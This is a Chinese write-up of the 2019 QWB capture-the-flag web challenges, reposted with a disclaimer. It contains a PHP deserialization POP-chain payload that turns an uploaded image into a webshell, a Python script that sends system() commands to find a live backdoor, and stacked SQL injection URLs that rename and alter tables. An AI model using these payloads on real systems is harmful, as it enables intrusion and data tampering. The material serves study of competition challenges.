2019强网杯wp

admin
admin
admin
138876
文章
114
评论
2024年8月18日00:50:32评论14 views字数 3839阅读12分47秒阅读模式

本来应该早一点就写好博客的,但是最近几个大作业压着,菜鸡累了,于是拖拖拖(捂脸

WEB

upload

这个网站进去登录注册以后就是一个上传图片的地方,经过一堆测试,发现只能上传图片,而且他会将文件名直接md5加密,然后再加上png后缀,所以想直接上个图片马是不行的了,接下来就是扫泄露扫出了www.tar.gz,所以就是愉快的源码分析了
先看index.php,里面有个check_login函数,可以看到里面有个反序列化,而且发序列化的内容是cookie里的user

1
2
3
4
5
6
7
8
9
10
11
12
 
public function login_check(){
        $profile=cookie('user');
        if(!empty($profile)){
            $this->profile=unserialize(base64_decode($profile));
            $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
            if(array_diff($this->profile_db,$this->profile)==null){
                return 1;
            }else{
                return 0;
            }
        }
    }

再继续审计,可以看到profile.php里面有个upload_img函数和__call函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
 
public function upload_img(){
    if($this->checker){
        if(!$this->checker->login_check()){
        $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
            $this->redirect($curr_url,302);
            exit();
    }
}
    if(!empty($_FILES)){
        $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
        $this->filename=md5($_FILES['upload_file']['name']).".png";
        $this->ext_check();
    }
    if($this->ext) {
        if(getimagesize($this->filename_tmp)) {
            @copy($this->filename_tmp, $this->filename);
            @unlink($this->filename_tmp);
            $this->img="../upload/$this->upload_menu/$this->filename";
            $this->update_img();
        }else{
            $this->error('Forbidden type!', url('../index'));
        }
    }else{
        $this->error('Unknow file type!', url('../index'));
    }
}
public function __call($name, $arguments)
{
    if($this->{$name}){
        $this->{$this->{$name}}($arguments);
    }
}

可以看到upload_img函数里面有个copy函数,如果我们能对其filenamefilename_tmp参数进行控制,那么我们就可以复制任意文件过去了,接下来就是想办法怎么控制里面的参数了
继续进行审计,可以看见__call函数如果我们可以控制name这个参数,我们就有可能调用过去upload_img这个函数了
那么怎么触发它呢,在register.php里面,有个__destruct的方法

1
2
3
4
5
6
 
public function __destruct()
{
    if(!$this->registed){
        $this->checker->index();
    }
}

register类里面是没有index方法的,所以,我们就能让他触发过去__call,然后想办法控制参数,让他触发upload_img函数,所以pop链就是__destruct --> __call --> upload_img,最后payload如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
 
<?php
namespace app\web\controller{
    class Profile{
        public $checker;
        public $index;
        public $filename_tmp;
        public $filename;
        public $ext;
        public function __construct()
{
            $this->index = "Ariel";
            $this->checker = 0;
            $this->filename_tmp = "upload/8b26631219c8f8ecac51b935cc87ccd1/f1f7f21e6c1bee52fad6244963831464.png";
            $this->filename = "upload/8b26631219c8f8ecac51b935cc87ccd1/Ariel.php";
            $this->Ariel = "upload_img";
            $this->ext = 1;
        }
        public function __destruct()
{
            echo "\nok";
        }
    }

    class Register{
        public $checker;
        public $registed;

        public function __construct($name)
{
            $this->registed = 0;
            $this->checker = $name;
        }
    }
    $p = new Profile();
    $r = new Register($p);
    $payload = array("ID" => 1, "payload" => $r);
    $payload = base64_encode(serialize($payload));
    echo $payload . "\n";
}

先上传一张内容为小马的图片,注意加个图片头,然后将生成的payload替换到cookie里,就可以成功触发反序列化,生成我们想要的文件
2019强网杯wp
接着就能愉快地执行任意命令了

强网先锋–上单

这道题一进去就给了一个框架的目录,发现能读的东西还很多,读一下log日志,能读到一句payload,还很熟悉,了解过的都能一下看出来是tp5任意命令执行的漏洞的payload,拿出来直接利用就能拿到flag了
2019强网杯wp

高明的黑客

这个进去能下下来一个压缩包,打开看见有3000多个文件,里面一堆的命令执行函数,但是前面又有一些将获得的变量置空的语句,大胆猜测,这中间有一个是真的小马,所以我们现在就是要将他找出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
import re
import os
import time
import requests

for i in os.listdir('F:\\hacker\\'):
    with open('F:\\hacker\\'+i,'r') as f:
        try:
            data=f.read()
            m=re.findall(r'\$_GET\[[\'"]?(.*?)[\'"?]\]', data)
            # print(i)
            for k in m:
                r=requests.get(url="http://ip/hacker/"+i+"/?"+k+"=system('cat /var/www/html/ctf/hacker/flag.txt');")
                print "http://ip/hacker/"+i+"/?"+k+"=system('cat /var/www/html/ctf/hacker/flag.txt');"
                if 'Ariel' in r.text:
                    print "[+]find!"
                    print i + " " + k
                    os._exit(0)
        except Exception as e:
            print(e)

找出来可利用的文件就能拿到flag了

随便注

过滤了常用的字符,但是1' or 1=1#可以拿到当前数据表的所有数据,而且还能进行堆叠注入

1
 
http://119.3.203.228:32420?inject=1'; show databases;

2019强网杯wp

1
 
http://119.3.203.228:32420?inject=1'; show tables;

2019强网杯wp

1
 
http://119.3.203.228:32420?inject=1'; use supersqli; show columns from `1919810931114514`;#

2019强网杯wp
接下来这里有个坑点,这个时候如果直接rename数据表再利用原来的select去读flag是不行的,因为少了id列,但是加了id这个字段还是在报错,只能写在一起执行才可以

1
 
http://119.3.203.228:32420?inject=1';rename table `words`to flag;rename table `1919810931114514`to words;alter table words add column id varchar(30);%23

这个时候就可以利用1' or 1=1#读到flag了
2019强网杯wp

FROM:Xi4or0uji

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月18日00:50:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2019强网杯wphttps://cn-sec.com/archives/3074956.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息